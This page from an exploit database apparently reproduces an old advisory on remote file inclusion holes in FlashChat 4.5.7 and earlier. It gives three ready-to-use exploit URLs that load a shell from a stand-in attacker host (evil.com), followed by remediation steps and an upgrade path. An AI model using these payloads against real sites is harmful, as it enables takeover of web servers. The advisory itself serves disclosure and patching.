0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability
======================================================================= FlashChat <= 4.5.7 (aedating4CMS.php) Remote File Include Vulnerability ======================================================================= NeXtMaN <mc.nadz [at] gmail.com> Here are 3 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/[script_path]/inc/cmses/aedating4CMS.php?dir[inc]=http://evil.com/shell.txt? http://site.com/[script_path]/inc/cmses/aedatingCMS2.php?dir[inc]=http://evil.com/shell.txt? http://site.com/[script_path]/inc/cmses/aedatingCMS.php?dir[inc]=http://evil.com/shell.txt? video here: Code: http://rapidshare.de/files/31362430/Flashchat.rar.html EDIT: Solution: It looks like the vulnerable files are there in case you want to integrate with another script. The script that would require these files is AEDating: you simply delete the following files and you will be secure: /inc/cmses/aedating4CMS.php /inc/cmses/aedatingCMS.php /inc/cmses/aedatingCMS2.php if your flashchat is integrated with AEDating and/or you dont want to delete the files you can just edit the 3 files to use your path like this: Replace this: $aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/'; include($aed_root_path . 'inc/header.inc.php'); require_once( "$dir[inc]db.inc.php" ); require_once( "$dir[inc]admin.inc.php" ); With this: $aed_root_path = realpath(dirname(__FILE__) . '/../../../') . '/'; include($aed_root_path . 'inc/header.inc.php'); require_once( "[Your AED path]/db.inc.php" ); require_once( "[Your AED path]/admin.inc.php" ); Alternatively you could just upgrade to 4.6.2 (just released) PS, all 3 of those files are vulnerable and will need editing. # 0day.today [2024-11-15] #